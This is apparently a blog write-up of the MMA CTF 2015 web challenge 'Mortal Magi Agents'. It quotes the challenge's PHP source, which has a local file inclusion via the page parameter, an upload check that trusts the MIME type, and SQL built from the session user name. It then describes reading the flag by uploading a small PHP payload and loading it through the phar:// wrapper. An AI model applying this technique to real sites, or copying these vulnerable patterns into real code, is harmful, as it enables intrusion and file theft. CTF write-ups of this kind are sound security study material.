shpik's world!

[Web] Mortal Magi Agents - 300pts

0x400 CTF/0x401 MMA 1st 2015



#Your ScoreScoreTeams


This problem is LFI vulnerable.

Problem Page [ ]

'indxe.php?page=settings' is vulnerable point.

file upload is settings page.

First I got a php source.

// home.php

// index.php

if (!isset($_GET["page"]) || isset($page))
    $page = "home";
    $page = $_GET["page"];
<!DOCTYPE html>
<html lang="en">
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags -->
    <meta name="description" content="">
    <meta name="author" content="">
    <link rel="icon" href="favicon.ico">

    <title>Mortal Magi Agents</title>

    <!-- Bootstrap core CSS -->
    <link href="css/bootstrap.min.css" rel="stylesheet">

    <!-- Custom styles for this template -->
    <link href="css/jumbotron.css" rel="stylesheet">

    <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
    <!--[if lt IE 9]>
      <script src=""></script>
      <script src=""></script>


    <nav class="navbar navbar-inverse navbar-fixed-top">
      <div class="container">
        <div class="navbar-header">
          <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
            <span class="sr-only">Toggle navigation</span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
          <a class="navbar-brand" href="index.php">Mortal Magi Agents</a>
        <div id="navbar" class="collapse navbar-collapse">
          <ul class="nav navbar-nav">
            <li class="active"><a href="?page=home">Home</a></li>
            <li><a href="?page=news">News</a></li>
            <li><a href="#contact">Contact</a></li>
<?php if (isset($_SESSION["user"])) { ?>
          <ul class="nav navbar-nav navbar-right">
            <li class='dropdown'>
              <a href="#" aria-expanded="false" class="dropdown-toggle" data-toggle="dropdown" role="button">
              if (isset($_SESSION["avator"])) {
                  echo '<img src="'.$_SESSION['avator'].'" width="32" height="32">';
              echo $_SESSION["user"];
              ?><span class='caret'></span></a>
              <ul class='dropdown-menu' role='menu'>
              <li><a href="?page=settings">Settings</a></li>
              <li><a href="logout.php">Sign out</a></li>
<?php } else { ?>
          <form class="navbar-form navbar-right" action="login.php" method="post">
            <div class="form-group">
              <input type="text" placeholder="User" class="form-control" name="user">
            <div class="form-group">
              <input type="password" placeholder="Password" class="form-control" name="password">
            <button type="submit" class="btn btn-success" name="signin">Sign in</button>
            <button type="submit" class="btn btn-danger" name="signup">Sign up</button>
<?php } ?>
        </div><!--/.nav-collapse -->

    <!-- Main jumbotron for a primary marketing message or call to action -->
    <div class="jumbotron">
    <div class="container">


        <p>Mortal Magi Agents 2015</p>
    </div> <!-- /container -->

    <!-- Bootstrap core JavaScript
    ================================================== -->
    <!-- Placed at the end of the document so the pages load faster -->
    <script src=""></script>
    <script src="js/bootstrap.min.js"></script>

// settings.php
require "./db.php";
if (isset($_FILES["file"])) {
    if ($_FILES['file']['type'] == "image/jpeg") {
        $ext = ".jpg";
    else if ($_FILES['file']['type'] == "image/gif") {
        $ext = ".gif";
    else if ($_FILES['file']['type'] == "image/png") {
        $ext = ".png";
    $filename = "avators/" . $_SESSION["user"] . sha1_file($_FILES['file']['tmp_name']) . $ext;
    move_uploaded_file($_FILES['file']['tmp_name'], $filename);
    $_SESSION["avator"] = $filename;
    $db = connect_db();
    $db->query("UPDATE users SET avator = '$filename' WHERE name = '".$_SESSION['user']."'");
<div class="page-header"><h1>Settings</h1></div>
if (isset($_SESSION["avator"])) {
<img src="<?php echo $_SESSION['avator']; ?>" width="64" height="64">
<h3>New avator</h3>
<form method="POST" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit">

upload file name is 'user'+sha1(filename)

but, this name is no problem.

i used phar://


<?php echo file_get_contents('../flag');?>



Flag is MMA{5ded4df85bb8785f9cff08268703278c4e18e3fd}

'0x400 CTF > 0x401 MMA 1st 2015' 카테고리의 다른 글

[Crypto] Twin Prime - 50pts  (0) 2016.09.05
[Web] Global Page - 50pts  (0) 2016.09.05
[Web] Get the admin password! - 100pts  (0) 2016.09.05
[Web] Mortal Magi Agents - 300pts  (0) 2015.09.09
[Web] Login as admin! - 30pts  (0) 2015.09.08